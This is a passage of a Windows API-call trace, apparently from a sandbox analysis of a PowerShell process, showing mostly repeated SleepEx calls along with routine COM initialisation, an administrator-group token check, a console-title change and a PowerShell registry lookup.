SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0169.292] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0169.358] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0169.430] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0169.573] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0169.646] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0171.517] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0171.579] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0171.625] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0171.684] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0171.722] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0171.793] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0171.854] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0171.905] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0171.948] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0171.999] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0172.163] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0172.273] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0172.288] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0172.301] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0172.306] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0172.319] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0172.328] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0172.350] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0172.407] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0172.467] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0172.477] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0172.479] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0172.539] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0172.618] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0172.711] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0172.782] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0172.819] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0172.868] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0172.923] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0172.976] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0173.003] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0173.058] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0173.120] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0173.190] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0173.367] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0173.414] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0173.482] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0173.523] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0173.615] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0173.700] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0173.769] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0173.819] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0173.830] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0173.844] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0173.881] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0173.944] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0174.007] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0174.058] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0174.118] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0174.205] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0174.421] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0174.557] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0186.241] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0186.313] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0186.390] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0186.829] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0186.921] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0187.015] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0187.108] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0187.214] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0187.297] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0187.359] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0187.405] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0187.784] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0187.917] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0188.015] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0188.095] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0188.214] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0188.362] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0188.452] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0188.547] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0188.907] SleepEx (dwMilliseconds=0x0, bAlertable=0) Thread: id = 84 os_tid = 0x704 [0130.686] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0130.687] CoGetContextToken (in: pToken=0x775faa4 | out: pToken=0x775faa4) returned 0x0 [0130.687] CObjectContext::QueryInterface () returned 0x0 [0130.687] CObjectContext::GetCurrentThreadType () returned 0x0 [0130.687] Release () returned 0x0 [0130.687] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0130.687] CoUninitialize () [0130.687] RoInitialize () returned 0x1 [0130.687] RoUninitialize () returned 0x0 [0130.687] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0130.945] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0131.156] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0131.389] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0131.577] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0131.885] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0132.053] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0132.262] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0132.713] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0132.884] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0133.162] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0133.897] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.037] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.209] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.339] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.412] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.489] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.757] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.921] GetCurrentProcess () returned 0xffffffff [0134.921] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x775f5e0 | out: TokenHandle=0x775f5e0*=0x288) returned 1 [0134.927] GetTokenInformation (in: TokenHandle=0x288, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x775f5e4 | out: TokenInformation=0x0, ReturnLength=0x775f5e4) returned 0 [0134.927] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x762e490 [0134.928] GetTokenInformation (in: TokenHandle=0x288, TokenInformationClass=0x8, TokenInformation=0x762e490, TokenInformationLength=0x4, ReturnLength=0x775f5e4 | out: TokenInformation=0x762e490, ReturnLength=0x775f5e4) returned 1 [0134.929] LocalFree (hMem=0x762e490) returned 0x0 [0134.931] DuplicateTokenEx (in: hExistingToken=0x288, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x775f5ec | out: phNewToken=0x775f5ec*=0x660) returned 1 [0134.932] CheckTokenMembership (in: TokenHandle=0x660, SidToCheck=0x5141db8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x775f5fc | out: IsMember=0x775f5fc) returned 1 [0134.932] CloseHandle (hObject=0x660) returned 1 [0135.095] CoTaskMemAlloc (cb=0x804) returned 0x75f5a88 [0135.096] GetConsoleTitleW (in: lpConsoleTitle=0x75f5a88, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x3a [0135.402] CoTaskMemFree (pv=0x75f5a88) [0135.557] CoTaskMemAlloc (cb=0x804) returned 0x1331e10 [0135.557] GetConsoleTitleW (in: lpConsoleTitle=0x1331e10, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x3a [0138.293] CoTaskMemFree (pv=0x1331e10) [0138.302] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0138.542] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0138.625] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0138.675] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0138.765] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0138.895] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.239] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.307] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.371] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.411] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.585] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.742] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.850] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.067] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.209] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.308] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.395] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.499] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.589] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.675] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.838] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0141.101] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0141.192] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0141.277] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0141.371] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0141.497] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0142.623] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0142.819] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x775f4b8 | out: phkResult=0x775f4b8*=0x6ac) returned 0x0 [0142.820] RegQueryValueExW (in: hKey=0x6ac, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x775f4d8, lpData=0x0, lpcbData=0x775f4d4*=0x0 | out: lpType=0x775f4d8*=0x1, lpData=0x0, lpcbData=0x775f4d4*=0x56) returned 0x0 [0142.820] RegQueryValueExW (in: hKey=0x6ac, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x775f4d8, lpData=0x51e9858, lpcbData=0x775f4d4*=0x56 | out: lpType=0x775f4d8*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x775f4d4*=0x56) returned 0x0 [0142.820] RegCloseKey (hKey=0x6ac) returned 0x0 [0143.276] CoCreateGuid (in: pguid=0x775f460 | out: pguid=0x775f460*(Data1=0xba17911a, Data2=0x69e9, Data3=0x4e1f, Data4=([0]=0xac, [1]=0x91, [2]=0xd7, [3]=0x47, [4]=0xec, [5]=0x5c, [6]=0x14, [7]=0x71))) returned 0x0 [0143.276] CoCreateGuid (in: pguid=0x775f460 | out: pguid=0x775f460*(Data1=0xf7b60748, Data2=0x1dcf, Data3=0x44fb, Data4=([0]=0xb5, [1]=0x66, [2]=0xd5, [3]=0xc3, [4]=0xba, [5]=0x25, [6]=0x78, [7]=0xb6))) returned 0x0 [0143.276] CoCreateGuid (in: pguid=0x775f460 | out: pguid=0x775f460*(Data1=0x1a6e7676, Data2=0x9513, Data3=0x4242, Data4=([0]=0x97, [1]=0xa5, [2]=0x0, [3]=0x35, [4]=0x2e, [5]=0x44, [6]=0x8a, [7]=0x99))) returned 0x0 [0143.276] CoCreateGuid (in: pguid=0x775f460 | out: pguid=0x775f460*(Data1=0x83d516cf, Data2=0x2dcf, Data3=0x4cd6, Data4=([0]=0xac, [1]=0xdd, [2]=0xe5, [3]=0xa5, [4]=0xbd, [5]=0xce, [6]=0xf3, [7]=0xf8))) returned 0x0 [0143.278] CoCreateGuid (in: pguid=0x775f460 | out: pguid=0x775f460*(Data1=0x187f63eb, Data2=0xf96d, Data3=0x44d0, Data4=([0]=0x9f, [1]=0xe3, [2]=0x17, [3]=0xa, [4]=0xc0, [5]=0x9b, [6]=0x37, [7]=0x5))) returned 0x0 [0143.278] CoCreateGuid (in: pguid=0x775f460 | out: pguid=0x775f460*(Data1=0x1ecc82a, Data2=0x4974, Data3=0x4c33, Data4=([0]=0xa5, [1]=0x7e, [2]=0x37, [3]=0x96, [4]=0x72, [5]=0x90, [6]=0x88, [7]=0x82))) returned 0x0 [0144.339] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0144.557] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0144.701] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0144.931] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.105] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.164] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.445] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.589] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.736] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.784] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.951] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0146.074] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0146.173] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0146.415] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0146.521] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0146.675] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0146.832] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0146.954] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0147.091] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0147.175] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0147.411] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0147.598] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.476] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.730] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.853] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.048] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.157] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.233] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.342] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.426] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.504] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.663] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.720] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.779] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.840] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.933] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.996] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.090] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.184] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.277] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.371] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.464] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.605] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.715] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.809] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.902] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.980] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0159.074] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0159.159] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0159.215] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0159.277] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0159.449] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0159.637] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0159.762] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0159.871] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0159.980] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0160.043] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0160.168] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0160.457] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0160.625] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0160.694] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0160.778] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0160.858] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0160.992] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0161.110] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0161.200] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0161.241] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0161.339] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0161.427] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0161.479] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0161.632] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0161.678] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0161.724] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0161.745] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0161.800] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0161.851] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0161.872] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0161.914] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0161.937] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0161.993] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0162.017] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0162.057] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0162.102] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0162.147] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0162.170] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0162.173] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0162.225] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0162.272] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0162.330] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0162.365] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0162.426] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0162.473] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0162.493] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0162.698] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0162.741] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0162.787] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0162.881] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0162.928] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0162.975] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0163.069] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0163.082] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0163.086] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0163.106] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0163.112] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0163.129] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0163.133] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0163.148] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0163.217] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0163.294] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0163.351] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0163.415] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0163.464] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0163.520] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0163.563] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0163.566] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0163.583] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0163.681] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0163.715] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0163.769] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0163.774] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0163.811] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0163.829] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0163.875] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0163.919] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0163.983] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0164.031] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0164.101] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0164.161] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0164.211] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0164.273] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0164.321] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0164.366] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0164.437] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0164.476] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0164.522] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0164.583] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0164.689] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0164.741] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0164.801] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0164.850] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0169.430] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0169.564] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0169.639] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0169.753] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0169.797] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0169.862] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0169.954] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0170.016] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0170.046] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0170.081] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0170.129] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0170.249] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0170.305] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0170.352] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0170.439] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0170.503] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0170.560] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0172.867] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0172.923] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0172.976] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0173.003] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0173.058] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0173.120] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0173.190] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0173.367] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0173.414] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0173.482] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0173.523] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0173.615] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0173.700] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0173.769] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0173.819] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0173.830] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0173.844] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0186.241] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0186.313] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0186.390] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0186.829] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0186.921] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0187.015] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0187.108] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0187.213] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0187.297] SleepEx 